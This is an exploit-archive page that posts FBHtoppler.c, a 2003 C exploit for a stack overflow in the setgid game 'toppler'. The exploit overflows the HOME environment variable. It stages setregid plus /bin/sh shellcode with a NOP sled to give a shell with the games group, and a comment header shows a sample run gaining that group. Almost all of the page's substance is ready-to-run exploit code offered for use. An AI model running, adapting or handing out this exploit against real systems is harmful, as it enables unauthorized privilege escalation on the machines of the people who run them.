exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FBHtoppler.c

FBHtoppler.c
Posted Jul 7, 2003
Authored by Bobby

Local exploit for the setgid game toppler. There is a stack overflow vulnerability with how toppler makes use of the HOME environment variable. Successful exploitation escalates user privileges to the group for games.

tags | exploit, overflow, local
SHA-256 | b929d57b7291105dabeaf26fc57dd8cfe25c295a669f60710c9a3723bbf60bf8

FBHtoppler.c

Change Mirror Download



/*
LOCAL TOPPLER EXPLOIT

A Buffer overflow in HOME enviroment variable.
Just your standard stack overflow...

[bobby@blah Code]$export HOME=`perl -e 'print"A"x144'`

[bobby@blah Code]$ /usr/bin/toppler
Nebulous version 0.96
Segmentation fault


Should give a GID=20 on successful exploitation.


[bobby@blah Code]$ id
uid=501(bobby) gid=501(bobby) groups=501(bobby)


[bobby@blah Code]$ ./FBHtoppler
Using address: 0xbffff81c
sh-2.05b$id
uid=501(bobby) gid=20(games) groups=501(bobby)


Kinda weird but could be useful in some situations...:P


SYSTEM TESTED ON:
Mandrake Linux release 9.0 (dolphin) for i586





Greetz: USG , DarkCode , DkD , Johan , s4t4nic_s0uls , Dj king , hein
, hyperd0t ,
RunningMan(thanx for the java), kafka ,Cc0d3r ,wazzabi(thx for the rza
album)

also , greetz to the dtor team.

Not forgetting all of the FBH crew too.. heh .pk rules!!!


FBHowns@hushmail.com , comments + criticisms welcome :P
*/




#include <stdlib.h>
#include <stdio.h>

#define DEFAULT_OFFSET 0
#define BUFFER_SIZE 250 // buffer is 144 , made larger
by 100+ for easy exploiting
#define EGG_SIZE 2048
#define NOP 0x90
#define ALIGN 1
#define BINARY "/usr/bin/toppler" //path to binary
char shellcode[] =



/*setregid(20,20) shellcode by me */


"\x31\xc0" /* xor %eax, %eax */
"\x31\xdb" /* xor %ebx, %ebx */
"\x31\xc9" /* xor %ecx, %ecx */
"\xb3\x14" /* mov $0x14, %bl */
"\xb1\x14" /* mov $0x14, %cl */
"\xb0\x47" /* mov $0x47, %al */
"\xcd\x80" /* int $0x80 */



/* Shellcode by Aleph One */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";



unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {


char *buffer, *ptr, *egg;

long *address_p, addr;

int offset= DEFAULT_OFFSET, bsize= BUFFER_SIZE;

int i, egg_size= EGG_SIZE;

if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) egg_size = atoi(argv[3]);


if (!(buffer = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

if (!(egg = malloc(egg_size))) {
printf("Can't allocate memory.\n");
exit(0);
}

addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);

ptr = buffer;
address_p = (long *) (ptr+ALIGN);
for (i = 0; i < bsize; i+=4)
*(address_p++) = addr;

ptr = egg;
for (i = 0; i < egg_size - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

buffer[bsize - 1] = '\0'; // '\0' or else there wil be trouble
egg[egg_size - 1] = '\0';

memcpy(egg,"EGG=",4);
putenv(egg); // put our made egg in the env
memcpy(buffer,"HOME=",5);
putenv(buffer); // put our prepared buffer in env
execlp(BINARY,BINARY,0); // execute it
}



------------------------------FBHtoppler.c---------------------------
--
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close